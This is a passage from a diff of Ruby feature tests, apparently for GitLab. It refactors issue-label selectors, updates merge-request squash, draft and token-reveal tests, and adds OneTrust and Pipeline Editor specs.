expect(find("#issue_#{issue2.id}")).to have_content 'bug' - expect(find("#issue_#{issue2.id}")).not_to have_content 'frontend' + expect(find(issue_1_selector)).to have_content 'bug' + expect(find(issue_1_selector)).to have_content 'frontend' + expect(find(issue_2_selector)).to have_content 'bug' + expect(find(issue_2_selector)).not_to have_content 'frontend' end end @@ -60,10 +63,10 @@ RSpec.describe 'Issues > 
Labels bulk assignment' do end it do - expect(find("#issue_#{issue1.id}")).to have_content 'bug' - expect(find("#issue_#{issue1.id}")).to have_content 'frontend' - expect(find("#issue_#{issue2.id}")).to have_content 'bug' - expect(find("#issue_#{issue2.id}")).not_to have_content 'frontend' + expect(find(issue_1_selector)).to have_content 'bug' + expect(find(issue_1_selector)).to have_content 'frontend' + expect(find(issue_2_selector)).to have_content 'bug' + expect(find(issue_2_selector)).not_to have_content 'frontend' end end @@ -75,10 +78,10 @@ RSpec.describe 'Issues > Labels bulk assignment' do end it do - expect(find("#issue_#{issue1.id}")).to have_content 'bug' - expect(find("#issue_#{issue1.id}")).to have_content 'frontend' - expect(find("#issue_#{issue2.id}")).not_to have_content 'bug' - expect(find("#issue_#{issue2.id}")).not_to have_content 'frontend' + expect(find(issue_1_selector)).to have_content 'bug' + expect(find(issue_1_selector)).to have_content 'frontend' + expect(find(issue_2_selector)).not_to have_content 'bug' + expect(find(issue_2_selector)).not_to have_content 'frontend' end end @@ -90,10 +93,10 @@ RSpec.describe 'Issues > Labels bulk assignment' do end it do - expect(find("#issue_#{issue1.id}")).to have_content 'bug' - expect(find("#issue_#{issue1.id}")).to have_content 'frontend' - expect(find("#issue_#{issue2.id}")).not_to have_content 'bug' - expect(find("#issue_#{issue2.id}")).not_to have_content 'frontend' + expect(find(issue_1_selector)).to have_content 'bug' + expect(find(issue_1_selector)).to have_content 'frontend' + expect(find(issue_2_selector)).not_to have_content 'bug' + expect(find(issue_2_selector)).not_to have_content 'frontend' end end end @@ -107,10 +110,10 @@ RSpec.describe 'Issues > Labels bulk assignment' do end it do - expect(find("#issue_#{issue1.id}")).to have_content 'bug' - expect(find("#issue_#{issue1.id}")).to have_content 'feature' - expect(find("#issue_#{issue2.id}")).to have_content 'bug' - 
expect(find("#issue_#{issue2.id}")).to have_content 'feature' + expect(find(issue_1_selector)).to have_content 'bug' + expect(find(issue_1_selector)).to have_content 'feature' + expect(find(issue_2_selector)).to have_content 'bug' + expect(find(issue_2_selector)).to have_content 'feature' end end @@ -122,10 +125,10 @@ RSpec.describe 'Issues > Labels bulk assignment' do end it do - expect(find("#issue_#{issue1.id}")).to have_content 'bug' - expect(find("#issue_#{issue1.id}")).to have_content 'feature' - expect(find("#issue_#{issue2.id}")).not_to have_content 'bug' - expect(find("#issue_#{issue2.id}")).not_to have_content 'feature' + expect(find(issue_1_selector)).to have_content 'bug' + expect(find(issue_1_selector)).to have_content 'feature' + expect(find(issue_2_selector)).not_to have_content 'bug' + expect(find(issue_2_selector)).not_to have_content 'feature' end end end @@ -144,8 +147,8 @@ RSpec.describe 'Issues > Labels bulk assignment' do end it do - expect(find("#issue_#{issue1.id}")).to have_content 'bug' - expect(find("#issue_#{issue2.id}")).to have_content 'bug' + expect(find(issue_1_selector)).to have_content 'bug' + expect(find(issue_2_selector)).to have_content 'bug' end end @@ -164,10 +167,10 @@ RSpec.describe 'Issues > Labels bulk assignment' do end it do - expect(find("#issue_#{issue1.id}")).not_to have_content 'bug' - expect(find("#issue_#{issue1.id}")).not_to have_content 'feature' - expect(find("#issue_#{issue2.id}")).not_to have_content 'bug' - expect(find("#issue_#{issue2.id}")).not_to have_content 'feature' + expect(find(issue_1_selector)).not_to have_content 'bug' + expect(find(issue_1_selector)).not_to have_content 'feature' + expect(find(issue_2_selector)).not_to have_content 'bug' + expect(find(issue_2_selector)).not_to have_content 'feature' end end @@ -183,8 +186,8 @@ RSpec.describe 'Issues > Labels bulk assignment' do end it do - expect(find("#issue_#{issue1.id}")).not_to have_content 'bug' - expect(find("#issue_#{issue2.id}")).to 
have_content 'feature' + expect(find(issue_1_selector)).not_to have_content 'bug' + expect(find(issue_2_selector)).to have_content 'feature' end end @@ -203,10 +206,10 @@ RSpec.describe 'Issues > Labels bulk assignment' do end it do - expect(find("#issue_#{issue1.id}")).not_to have_content 'bug' - expect(find("#issue_#{issue1.id}")).to have_content 'feature' - expect(find("#issue_#{issue2.id}")).not_to have_content 'bug' - expect(find("#issue_#{issue2.id}")).to have_content 'feature' + expect(find(issue_1_selector)).not_to have_content 'bug' + expect(find(issue_1_selector)).to have_content 'feature' + expect(find(issue_2_selector)).not_to have_content 'bug' + expect(find(issue_2_selector)).to have_content 'feature' end end end @@ -222,18 +225,18 @@ RSpec.describe 'Issues > Labels bulk assignment' do end it 'keeps labels' do - expect(find("#issue_#{issue1.id}")).to have_content 'bug' - expect(find("#issue_#{issue2.id}")).to have_content 'feature' + expect(find(issue_1_selector)).to have_content 'bug' + expect(find(issue_2_selector)).to have_content 'feature' check 'Select all' open_milestone_dropdown(['First Release']) update_issues - expect(find("#issue_#{issue1.id}")).to have_content 'bug' - expect(find("#issue_#{issue1.id}")).to have_content 'First Release' - expect(find("#issue_#{issue2.id}")).to have_content 'feature' - expect(find("#issue_#{issue2.id}")).to have_content 'First Release' + expect(find(issue_1_selector)).to have_content 'bug' + expect(find(issue_1_selector)).to have_content 'First Release' + expect(find(issue_2_selector)).to have_content 'feature' + expect(find(issue_2_selector)).to have_content 'First Release' end end @@ -244,18 +247,18 @@ RSpec.describe 'Issues > Labels bulk assignment' do end it 'keeps existing label and new label is present' do - expect(find("#issue_#{issue1.id}")).to have_content 'bug' + expect(find(issue_1_selector)).to have_content 'bug' check 'Select all' open_milestone_dropdown ['First Release'] open_labels_dropdown 
['feature'] update_issues - expect(find("#issue_#{issue1.id}")).to have_content 'bug' - expect(find("#issue_#{issue1.id}")).to have_content 'feature' - expect(find("#issue_#{issue1.id}")).to have_content 'First Release' - expect(find("#issue_#{issue2.id}")).to have_content 'feature' - expect(find("#issue_#{issue2.id}")).to have_content 'First Release' + expect(find(issue_1_selector)).to have_content 'bug' + expect(find(issue_1_selector)).to have_content 'feature' + expect(find(issue_1_selector)).to have_content 'First Release' + expect(find(issue_2_selector)).to have_content 'feature' + expect(find(issue_2_selector)).to have_content 'First Release' end end @@ -269,9 +272,9 @@ RSpec.describe 'Issues > Labels bulk assignment' do end it 'keeps existing label and new label is present' do - expect(find("#issue_#{issue1.id}")).to have_content 'bug' - expect(find("#issue_#{issue1.id}")).to have_content 'bug' - expect(find("#issue_#{issue2.id}")).to have_content 'feature' + expect(find(issue_1_selector)).to have_content 'bug' + expect(find(issue_1_selector)).to have_content 'bug' + expect(find(issue_2_selector)).to have_content 'feature' check 'Select all' @@ -279,11 +282,11 @@ RSpec.describe 'Issues > Labels bulk assignment' do unmark_labels_in_dropdown ['feature'] update_issues - expect(find("#issue_#{issue1.id}")).to have_content 'bug' - expect(find("#issue_#{issue1.id}")).not_to have_content 'feature' - expect(find("#issue_#{issue1.id}")).to have_content 'First Release' - expect(find("#issue_#{issue2.id}")).not_to have_content 'feature' - expect(find("#issue_#{issue2.id}")).to have_content 'First Release' + expect(find(issue_1_selector)).to have_content 'bug' + expect(find(issue_1_selector)).not_to have_content 'feature' + expect(find(issue_1_selector)).to have_content 'First Release' + expect(find(issue_2_selector)).not_to have_content 'feature' + expect(find(issue_2_selector)).to have_content 'First Release' end end @@ -300,19 +303,19 @@ RSpec.describe 'Issues > 
Labels bulk assignment' do end it 'keeps labels' do - expect(find("#issue_#{issue1.id}")).to have_content 'bug' - expect(find("#issue_#{issue1.id}")).to have_content 'First Release' - expect(find("#issue_#{issue2.id}")).to have_content 'feature' - expect(find("#issue_#{issue2.id}")).to have_content 'First Release' + expect(find(issue_1_selector)).to have_content 'bug' + expect(find(issue_1_selector)).to have_content 'First Release' + expect(find(issue_2_selector)).to have_content 'feature' + expect(find(issue_2_selector)).to have_content 'First Release' check 'Select all' open_milestone_dropdown(['No milestone']) update_issues - expect(find("#issue_#{issue1.id}")).to have_content 'bug' - expect(find("#issue_#{issue1.id}")).not_to have_content 'First Release' - expect(find("#issue_#{issue2.id}")).to have_content 'feature' - expect(find("#issue_#{issue2.id}")).not_to have_content 'First Release' + expect(find(issue_1_selector)).to have_content 'bug' + expect(find(issue_1_selector)).not_to have_content 'First Release' + expect(find(issue_2_selector)).to have_content 'feature' + expect(find(issue_2_selector)).not_to have_content 'First Release' end end end @@ -324,7 +327,7 @@ RSpec.describe 'Issues > Labels bulk assignment' do end it do - expect(find("#issue_#{issue1.id}")).to have_content 'bug' + expect(find(issue_1_selector)).to have_content 'bug' check_issue issue1 open_labels_dropdown ['feature'] @@ -333,8 +336,8 @@ RSpec.describe 'Issues > Labels bulk assignment' do update_issues sleep 1 # needed - expect(find("#issue_#{issue1.id}")).to have_content 'bug' - expect(find("#issue_#{issue1.id}")).to have_content 'feature' + expect(find(issue_1_selector)).to have_content 'bug' + expect(find(issue_1_selector)).to have_content 'feature' end end @@ -350,7 +353,7 @@ RSpec.describe 'Issues > Labels bulk assignment' do update_issues - expect(find("#issue_#{issue1.id}")).to have_content 'feature' + expect(find(issue_1_selector)).to have_content 'feature' end end @@ -381,12 
+384,12 @@ RSpec.describe 'Issues > Labels bulk assignment' do update_issues - first_issue = find("#issue_#{issue1.id}") + first_issue = find(issue_1_selector) expect(first_issue).not_to have_content 'bug' expect(first_issue).to have_content 'feature' expect(first_issue).to have_content 'wontfix' - second_issue = find("#issue_#{issue2.id}") + second_issue = find(issue_2_selector) expect(second_issue).not_to have_content 'bug' expect(second_issue).not_to have_content 'feature' expect(second_issue).to have_content 'wontfix' diff --git a/spec/features/issues/user_edits_issue_spec.rb b/spec/features/issues/user_edits_issue_spec.rb index 76cec2502e3..a036a9a5bbc 100644 --- a/spec/features/issues/user_edits_issue_spec.rb +++ b/spec/features/issues/user_edits_issue_spec.rb @@ -15,7 +15,6 @@ RSpec.describe "Issues > User edits issue", :js do context 'with authorized user' do before do - stub_feature_flags(labels_widget: false) project.add_developer(user) project_with_milestones.add_developer(user) sign_in(user) @@ -146,12 +145,12 @@ RSpec.describe "Issues > User edits issue", :js do fill_in 'Comment', with: '/label ~syzygy' click_button 'Comment' - expect(page).to have_text('added syzygy label just now') + expect(page).to have_text('added syzygy label just now', wait: 300) page.within '.block.labels' do # Remove `verisimilitude` label within '.gl-label' do - click_button + click_button 'Remove label' end expect(page).to have_text('syzygy') @@ -418,7 +417,7 @@ RSpec.describe "Issues > User edits issue", :js do it 'adds due date to issue' do date = Date.today.at_beginning_of_month + 2.days - page.within '[data-testid="due-date"]' do + page.within '[data-testid="sidebar-due-date"]' do click_button 'Edit' page.within '.pika-single' do click_button date.day @@ -433,7 +432,7 @@ RSpec.describe "Issues > User edits issue", :js do it 'removes due date from issue' do date = Date.today.at_beginning_of_month + 2.days - page.within '[data-testid="due-date"]' do + page.within 
'[data-testid="sidebar-due-date"]' do click_button 'Edit' page.within '.pika-single' do diff --git a/spec/features/issues/user_invites_from_a_comment_spec.rb b/spec/features/issues/user_invites_from_a_comment_spec.rb deleted file mode 100644 index 82061f6ed79..00000000000 --- a/spec/features/issues/user_invites_from_a_comment_spec.rb +++ /dev/null @@ -1,25 +0,0 @@ -# frozen_string_literal: true - -require "spec_helper" - -RSpec.describe "User invites from a comment", :js do - let_it_be(:project) { create(:project_empty_repo, :public) } - let_it_be(:issue) { create(:issue, project: project) } - let_it_be(:user) { project.owner } - - before do - sign_in(user) - end - - it "launches the invite modal from invite link on a comment" do - stub_experiments(invite_members_in_comment: :invite_member_link) - - visit project_issue_path(project, issue) - - page.within(".new-note") do - click_button 'Invite Member' - end - - expect(page).to have_content("You're inviting members to the") - end -end diff --git a/spec/features/labels_hierarchy_spec.rb b/spec/features/labels_hierarchy_spec.rb index 25c315f2d16..6c8d41fd96f 100644 --- a/spec/features/labels_hierarchy_spec.rb +++ b/spec/features/labels_hierarchy_spec.rb @@ -17,7 +17,6 @@ RSpec.describe 'Labels Hierarchy', :js do let!(:project_label_1) { create(:label, project: project_1, title: 'Label_4') } before do - stub_feature_flags(labels_widget: false) grandparent.add_owner(user) sign_in(user) @@ -28,13 +27,12 @@ RSpec.describe 'Labels Hierarchy', :js do [grandparent_group_label, parent_group_label, project_label_1].each do |label| page.within('.block.labels') do click_on 'Edit' - end - wait_for_requests + wait_for_requests - find('a.label-item', text: label.title).click - wait_for_requests - click_on 'Close' + click_on label.title + click_on 'Close' + end wait_for_requests @@ -66,7 +64,7 @@ RSpec.describe 'Labels Hierarchy', :js do end else expect_issues_list_count(1) - expect(page).to have_selector('span.issue-title-text', 
text: labeled_issue.title) + expect(page).to have_selector('.issue-title', text: labeled_issue.title) end end end @@ -76,7 +74,7 @@ RSpec.describe 'Labels Hierarchy', :js do wait_for_requests - expect(page).not_to have_selector('.btn-link', text: child_group_label.title) + expect(page).not_to have_link child_group_label.title end end @@ -109,9 +107,9 @@ RSpec.describe 'Labels Hierarchy', :js do end else expect_issues_list_count(3) - expect(page).to have_selector('span.issue-title-text', text: labeled_issue.title) - expect(page).to have_selector('span.issue-title-text', text: labeled_issue_2.title) - expect(page).to have_selector('span.issue-title-text', text: labeled_issue_3.title) + expect(page).to have_selector('.issue-title', text: labeled_issue.title) + expect(page).to have_selector('.issue-title', text: labeled_issue_2.title) + expect(page).to have_selector('.issue-title', text: labeled_issue_3.title) end end end @@ -131,7 +129,7 @@ RSpec.describe 'Labels Hierarchy', :js do end else expect_issues_list_count(1) - expect(page).to have_selector('span.issue-title-text', text: labeled_issue_3.title) + expect(page).to have_selector('.issue-title', text: labeled_issue_3.title) end end @@ -233,7 +231,7 @@ RSpec.describe 'Labels Hierarchy', :js do wait_for_requests - expect(page).not_to have_selector('.btn-link', text: child_group_label.title) + expect(page).not_to have_link child_group_label.title end end diff --git a/spec/features/merge_request/user_customizes_merge_commit_message_spec.rb b/spec/features/merge_request/user_customizes_merge_commit_message_spec.rb index 06795344c5c..67a232607cd 100644 --- a/spec/features/merge_request/user_customizes_merge_commit_message_spec.rb +++ b/spec/features/merge_request/user_customizes_merge_commit_message_spec.rb @@ -7,19 +7,26 @@ RSpec.describe 'Merge request < User customizes merge commit message', :js do let(:user) { project.creator } let(:issue_1) { create(:issue, project: project)} let(:issue_2) { create(:issue, project: 
project)} + let(:source_branch) { 'csv' } + let(:target_branch) { 'master' } + let(:squash) { false } let(:merge_request) do create( :merge_request, - :simple, source_project: project, - description: "Description\n\nclosing #{issue_1.to_reference}, #{issue_2.to_reference}" + target_project: project, + source_branch: source_branch, + target_branch: target_branch, + description: "Description\n\nclosing #{issue_1.to_reference}, #{issue_2.to_reference}", + squash: squash ) end - let(:textbox) { page.find(:css, '#merge-message-edit', visible: false) } - let(:default_message) do + let(:merge_textbox) { page.find(:css, '#merge-message-edit', visible: false) } + let(:squash_textbox) { page.find(:css, '#squash-message-edit', visible: false) } + let(:default_merge_commit_message) do [ - "Merge branch 'feature' into 'master'", + "Merge branch '#{source_branch}' into '#{target_branch}'", merge_request.title, "Closes #{issue_1.to_reference} and #{issue_2.to_reference}", "See merge request #{merge_request.to_reference(full: true)}" @@ -35,8 +42,8 @@ RSpec.describe 'Merge request < User customizes merge commit message', :js do it 'has commit message without description' do expect(page).not_to have_selector('#merge-message-edit') first('.js-mr-widget-commits-count').click - expect(textbox).to be_visible - expect(textbox.value).to eq(default_message) + expect(merge_textbox).to be_visible + expect(merge_textbox.value).to eq(default_merge_commit_message) end context 'when target project has merge commit template set' do @@ -45,8 +52,34 @@ RSpec.describe 'Merge request < User customizes merge commit message', :js do it 'uses merge commit template' do expect(page).not_to have_selector('#merge-message-edit') first('.js-mr-widget-commits-count').click - expect(textbox).to be_visible - expect(textbox.value).to eq(merge_request.title) + expect(merge_textbox).to be_visible + expect(merge_textbox.value).to eq(merge_request.title) + end + end + + context 'when squash is performed' do + 
let(:squash) { true } + + it 'has default message with merge request title' do + expect(page).not_to have_selector('#squash-message-edit') + first('.js-mr-widget-commits-count').click + expect(squash_textbox).to be_visible + expect(merge_textbox).to be_visible + expect(squash_textbox.value).to eq(merge_request.title) + expect(merge_textbox.value).to eq(default_merge_commit_message) + end + + context 'when target project has squash commit template set' do + let(:project) { create(:project, :public, :repository, squash_commit_template: '%{description}') } + + it 'uses squash commit template' do + expect(page).not_to have_selector('#squash-message-edit') + first('.js-mr-widget-commits-count').click + expect(squash_textbox).to be_visible + expect(merge_textbox).to be_visible + expect(squash_textbox.value).to eq(merge_request.description) + expect(merge_textbox.value).to eq(default_merge_commit_message) + end end end end diff --git a/spec/features/merge_request/user_expands_diff_spec.rb b/spec/features/merge_request/user_expands_diff_spec.rb index 09c5897f102..52554f11d28 100644 --- a/spec/features/merge_request/user_expands_diff_spec.rb +++ b/spec/features/merge_request/user_expands_diff_spec.rb @@ -7,7 +7,6 @@ RSpec.describe 'User expands diff', :js do let(:merge_request) { create(:merge_request, source_branch: 'expand-collapse-files', source_project: project, target_project: project) } before do - stub_feature_flags(increased_diff_limits: false) allow(Gitlab::CurrentSettings).to receive(:diff_max_patch_bytes).and_return(100.kilobytes) visit(diffs_project_merge_request_path(project, merge_request)) diff --git a/spec/features/merge_request/user_invites_from_a_comment_spec.rb b/spec/features/merge_request/user_invites_from_a_comment_spec.rb deleted file mode 100644 index 79865094fd0..00000000000 --- a/spec/features/merge_request/user_invites_from_a_comment_spec.rb +++ /dev/null @@ -1,25 +0,0 @@ -# frozen_string_literal: true - -require "spec_helper" - -RSpec.describe 
"User invites from a comment", :js do - let_it_be(:project) { create(:project, :public, :repository) } - let_it_be(:merge_request) { create(:merge_request, source_project: project) } - let_it_be(:user) { project.owner } - - before do - sign_in(user) - end - - it "launches the invite modal from invite link on a comment" do - stub_experiments(invite_members_in_comment: :invite_member_link) - - visit project_merge_request_path(project, merge_request) - - page.within(".new-note") do - click_button 'Invite Member' - end - - expect(page).to have_content("You're inviting members to the") - end -end diff --git a/spec/features/merge_request/user_posts_diff_notes_spec.rb b/spec/features/merge_request/user_posts_diff_notes_spec.rb index 79e46e69157..9e314e18563 100644 --- a/spec/features/merge_request/user_posts_diff_notes_spec.rb +++ b/spec/features/merge_request/user_posts_diff_notes_spec.rb @@ -4,6 +4,7 @@ require 'spec_helper' RSpec.describe 'Merge request > User posts diff notes', :js do include MergeRequestDiffHelpers + include Spec::Support::Helpers::ModalHelpers let(:merge_request) { create(:merge_request) } let(:project) { merge_request.source_project } @@ -238,10 +239,8 @@ RSpec.describe 'Merge request > User posts diff notes', :js do def should_allow_dismissing_a_comment(line_holder, diff_side = nil) write_comment_on_line(line_holder, diff_side) - find('.js-close-discussion-note-form').click - - page.within('.modal') do - click_button 'OK' + accept_gl_confirm(s_('Notes|Are you sure you want to cancel creating this comment?')) do + find('.js-close-discussion-note-form').click end assert_comment_dismissal(line_holder) diff --git a/spec/features/merge_request/user_resolves_wip_mr_spec.rb b/spec/features/merge_request/user_resolves_wip_mr_spec.rb index 93b14279a06..fd405855cf8 100644 --- a/spec/features/merge_request/user_resolves_wip_mr_spec.rb +++ b/spec/features/merge_request/user_resolves_wip_mr_spec.rb @@ -33,7 +33,7 @@ RSpec.describe 'Merge request > User 
resolves Work in Progress', :js do it 'retains merge request data after clicking Resolve WIP status' do expect(page.find('.ci-widget-content')).to have_content("Pipeline ##{pipeline.id}") - expect(page).to have_content "This merge request is still a draft." + expect(page).to have_content "Merge blocked: merge request must be marked as ready. It's still marked as draft." page.within('.mr-state-widget') do click_button('Mark as ready') @@ -45,7 +45,7 @@ RSpec.describe 'Merge request > User resolves Work in Progress', :js do # merge request widget refreshes, which masks missing elements # that should already be present. expect(page.find('.ci-widget-content', wait: 0)).to have_content("Pipeline ##{pipeline.id}") - expect(page).not_to have_content('This merge request is still a draft.') + expect(page).not_to have_content("Merge blocked: merge request must be marked as ready. It's still marked as draft.") end end end diff --git a/spec/features/merge_request/user_sees_wip_help_message_spec.rb b/spec/features/merge_request/user_sees_wip_help_message_spec.rb index 0a6a3d82ee0..d33e54f2e3d 100644 --- a/spec/features/merge_request/user_sees_wip_help_message_spec.rb +++ b/spec/features/merge_request/user_sees_wip_help_message_spec.rb @@ -46,8 +46,8 @@ RSpec.describe 'Merge request > User sees draft help message' do 'It looks like you have some draft commits in this branch' ) expect(page).to have_text( - "Start the title with Draft: to prevent a merge request that is a \ -work in progress from being merged before it's ready." + "Start the title with Draft: to prevent a merge request draft \ +from merging before it's ready." 
) end end diff --git a/spec/features/merge_request/user_squashes_merge_request_spec.rb b/spec/features/merge_request/user_squashes_merge_request_spec.rb index 15f59c0d7bc..2a48657ac4f 100644 --- a/spec/features/merge_request/user_squashes_merge_request_spec.rb +++ b/spec/features/merge_request/user_squashes_merge_request_spec.rb @@ -22,7 +22,7 @@ RSpec.describe 'User squashes a merge request', :js do committer_name: user.name) merge_commit = an_object_having_attributes(sha: a_string_matching(/\h{40}/), - message: a_string_starting_with("Merge branch 'csv' into 'master'"), + message: a_string_starting_with("Merge branch '#{source_branch}' into 'master'"), author_name: user.name, committer_name: user.name) @@ -57,34 +57,34 @@ RSpec.describe 'User squashes a merge request', :js do end context 'when the MR has only one commit' do - let(:source_branch) { 'master' } - let(:target_branch) { 'branch-merged' } - let(:protected_source_branch) { true } + let(:source_branch) { 'feature' } + let(:target_branch) { 'master' } let(:source_sha) { project.commit(source_branch).sha } let(:target_sha) { project.commit(target_branch).sha } before do - merge_request = create(:merge_request, source_project: project, target_project: project, source_branch: source_branch, target_branch: target_branch, squash: true) - - visit project_merge_request_path(project, merge_request) + visit project_new_merge_request_path(project, merge_request: { target_branch: target_branch, source_branch: source_branch }) + check 'merge_request[squash]' + click_on 'Create merge request' + wait_for_requests end - it 'accepts the merge request without issuing a squash request', :sidekiq_inline do - expect_next_instance_of(Gitlab::GitalyClient::OperationService) do |instance| - expect(instance).not_to receive(:user_squash) + context 'when squash message differs from existing commit message' do + before do + accept_mr end - expect(project.repository.ancestor?(source_branch, target_branch)).to be_falsey - 
expect(page).not_to have_field('squash') - - accept_mr - - expect(page).to have_content('Merged') + include_examples 'squash' + end - latest_target_commits = project.repository.commits_between(source_sha, target_sha).map(&:raw) + context 'when squash message is the same as existing commit message' do + before do + click_button("Modify commit messages") + fill_in('Squash commit message', with: project.commit(source_branch).safe_message) + accept_mr + end - expect(latest_target_commits.count).to eq(1) - expect(project.repository.ancestor?(source_branch, target_branch)).to be_truthy + include_examples 'no squash' end end diff --git a/spec/features/merge_request/user_views_open_merge_request_spec.rb b/spec/features/merge_request/user_views_open_merge_request_spec.rb index 073706cf9d8..b5a973a53c0 100644 --- a/spec/features/merge_request/user_views_open_merge_request_spec.rb +++ b/spec/features/merge_request/user_views_open_merge_request_spec.rb @@ -20,7 +20,7 @@ RSpec.describe 'User views an open merge request' do # Work around a weird Capybara behavior where calling `parent` on a node # returns the whole document, not the node's actual parent element - expect(find(:xpath, "#{node.path}/..").text).to eq(merge_request.description[2..-1]) + expect(find(:xpath, "#{node.path}/..").text).to eq(merge_request.description[2..]) expect(page).to have_content(merge_request.title) end diff --git a/spec/features/one_trust_spec.rb b/spec/features/one_trust_spec.rb new file mode 100644 index 00000000000..0ed08e8b99b --- /dev/null +++ b/spec/features/one_trust_spec.rb @@ -0,0 +1,23 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe 'OneTrust' do + context 'almost there page' do + context 'when OneTrust is enabled' do + let_it_be(:onetrust_url) { 'https://*.onetrust.com' } + let_it_be(:one_trust_id) { SecureRandom.uuid } + + before do + stub_config(extra: { one_trust_id: one_trust_id }) + stub_feature_flags(ecomm_instrumentation: true) + visit 
users_almost_there_path + end + + it 'has the OneTrust CSP settings', :aggregate_failures do + expect(response_headers['Content-Security-Policy']).to include("#{onetrust_url}") + expect(page.html).to include("https://cdn.cookielaw.org/consent/#{one_trust_id}/OtAutoBlock.js") + end + end + end +end diff --git a/spec/features/profile_spec.rb b/spec/features/profile_spec.rb index 7d935298f38..24ba55994ae 100644 --- a/spec/features/profile_spec.rb +++ b/spec/features/profile_spec.rb @@ -63,11 +63,24 @@ RSpec.describe 'Profile account page', :js do end describe 'when I reset feed token' do - before do + it 'resets feed token with `hide_access_tokens` feature flag enabled' do visit profile_personal_access_tokens_path + + within('[data-testid="feed-token-container"]') do + previous_token = find_field('Feed token').value + + accept_confirm { click_link('reset this token') } + + click_button('Click to reveal') + + expect(find_field('Feed token').value).not_to eq(previous_token) + end end - it 'resets feed token' do + it 'resets feed token with `hide_access_tokens` feature flag disabled' do + stub_feature_flags(hide_access_tokens: false) + visit profile_personal_access_tokens_path + within('.feed-token-reset') do previous_token = find("#feed_token").value @@ -82,10 +95,26 @@ RSpec.describe 'Profile account page', :js do before do allow(Gitlab.config.incoming_email).to receive(:enabled).and_return(true) stub_feature_flags(bootstrap_confirmation_modals: false) + end + + it 'resets incoming email token with `hide_access_tokens` feature flag enabled' do visit profile_personal_access_tokens_path + + within('[data-testid="incoming-email-token-container"]') do + previous_token = find_field('Incoming email token').value + + accept_confirm { click_link('reset this token') } + + click_button('Click to reveal') + + expect(find_field('Incoming email token').value).not_to eq(previous_token) + end end - it 'resets incoming email token' do + it 'resets incoming email token with 
`hide_access_tokens` feature flag disabled' do + stub_feature_flags(hide_access_tokens: false) + visit profile_personal_access_tokens_path + within('.incoming-email-token-reset') do previous_token = find('#incoming_email_token').value diff --git a/spec/features/profiles/personal_access_tokens_spec.rb b/spec/features/profiles/personal_access_tokens_spec.rb index 74505633cae..135a940807e 100644 --- a/spec/features/profiles/personal_access_tokens_spec.rb +++ b/spec/features/profiles/personal_access_tokens_spec.rb @@ -18,10 +18,6 @@ RSpec.describe 'Profile > Personal Access Tokens', :js do find("#created-personal-access-token").value end - def feed_token - find("#feed_token").value - end - def feed_token_description "Your feed token authenticates you when your RSS reader loads a personalized RSS feed or when your calendar application loads a personalized calendar. It is visible in those feed URLs." end @@ -136,12 +132,24 @@ RSpec.describe 'Profile > Personal Access Tokens', :js do describe "feed token" do context "when enabled" do - it "displays feed token" do + it "displays feed token with `hide_access_tokens` feature flag enabled" do allow(Gitlab::CurrentSettings).to receive(:disable_feed_token).and_return(false) visit profile_personal_access_tokens_path - expect(feed_token).to eq(user.feed_token) + within('[data-testid="feed-token-container"]') do + click_button('Click to reveal') + + expect(page).to have_field('Feed token', with: user.feed_token) + expect(page).to have_content(feed_token_description) + end + end + + it "displays feed token with `hide_access_tokens` feature flag disabled" do + stub_feature_flags(hide_access_tokens: false) + allow(Gitlab::CurrentSettings).to receive(:disable_feed_token).and_return(false) + visit profile_personal_access_tokens_path + expect(page).to have_field('Feed token', with: user.feed_token) expect(page).to have_content(feed_token_description) end end @@ -151,8 +159,8 @@ RSpec.describe 'Profile > Personal Access Tokens', :js do 
allow(Gitlab::CurrentSettings).to receive(:disable_feed_token).and_return(true) visit profile_personal_access_tokens_path - expect(page).to have_no_content(feed_token_description) - expect(page).to have_no_css("#feed_token") + expect(page).not_to have_content(feed_token_description) + expect(page).not_to have_field('Feed token') end end end diff --git a/spec/features/profiles/two_factor_auths_spec.rb b/spec/features/profiles/two_factor_auths_spec.rb index a9256a73d7b..9a58950b8f3 100644 --- a/spec/features/profiles/two_factor_auths_spec.rb +++ b/spec/features/profiles/two_factor_auths_spec.rb @@ -3,6 +3,8 @@ require 'spec_helper' RSpec.describe 'Two factor auths' do + include Spec::Support::Helpers::ModalHelpers + context 'when signed in' do before do sign_in(user) @@ -70,7 +72,7 @@ RSpec.describe 'Two factor auths' do click_button 'Disable two-factor authentication' - page.within('[role="dialog"]') do + within_modal do click_button 'Disable' end @@ -80,7 +82,7 @@ RSpec.describe 'Two factor auths' do click_button 'Disable two-factor authentication' - page.within('[role="dialog"]') do + within_modal do click_button 'Disable' end @@ -112,7 +114,7 @@ RSpec.describe 'Two factor auths' do click_button 'Disable two-factor authentication' - page.within('[role="dialog"]') do + within_modal do click_button 'Disable' end diff --git a/spec/features/profiles/user_visits_profile_spec.rb b/spec/features/profiles/user_visits_profile_spec.rb index 273d52996d3..d90ac439eee 100644 --- a/spec/features/profiles/user_visits_profile_spec.rb +++ b/spec/features/profiles/user_visits_profile_spec.rb @@ -29,6 +29,24 @@ RSpec.describe 'User visits their profile' do expect(find('.file-content')).to have_content('testme') end + it 'hides empty user readme' do + project = create(:project, :repository, :public, path: user.username, namespace: user.namespace) + + Files::UpdateService.new( + project, + user, + start_branch: 'master', + branch_name: 'master', + commit_message: 'Update feature', + 
file_path: 'README.md', + file_content: '' + ).execute + + visit(user_path(user)) + + expect(page).not_to have_selector('.file-content') + end + context 'when user has groups' do let(:group) do create :group do |group| diff --git a/spec/features/projects/ci/editor_spec.rb b/spec/features/projects/ci/editor_spec.rb index 7fe1c63f490..16cfa9f5f84 100644 --- a/spec/features/projects/ci/editor_spec.rb +++ b/spec/features/projects/ci/editor_spec.rb @@ -51,5 +51,65 @@ RSpec.describe 'Pipeline Editor', :js do expect(page).not_to have_content(default_branch) end end + + it 'displays new branch as selected after commiting on a new branch' do + find('#target-branch-field').set('new_branch', clear: :backspace) + + click_button 'Commit changes' + + page.within('[data-testid="branch-selector"]') do + expect(page).to have_content('new_branch') + expect(page).not_to have_content(default_branch) + end + end + end + + context 'Editor content' do + it 'user can reset their CI configuration' do + click_button 'Collapse' + + page.within('#source-editor-') do + find('textarea').send_keys '123' + end + + # It takes some time after sending keys for the reset + # btn to register the changes inside the editor + sleep 1 + click_button 'Reset' + + expect(page).to have_css('#reset-content') + + page.within('#reset-content') do + click_button 'Reset file' + end + + page.within('#source-editor-') do + expect(page).to have_content('Default Content') + expect(page).not_to have_content('Default Content123') + end + end + + it 'user can cancel reseting their CI configuration' do + click_button 'Collapse' + + page.within('#source-editor-') do + find('textarea').send_keys '123' + 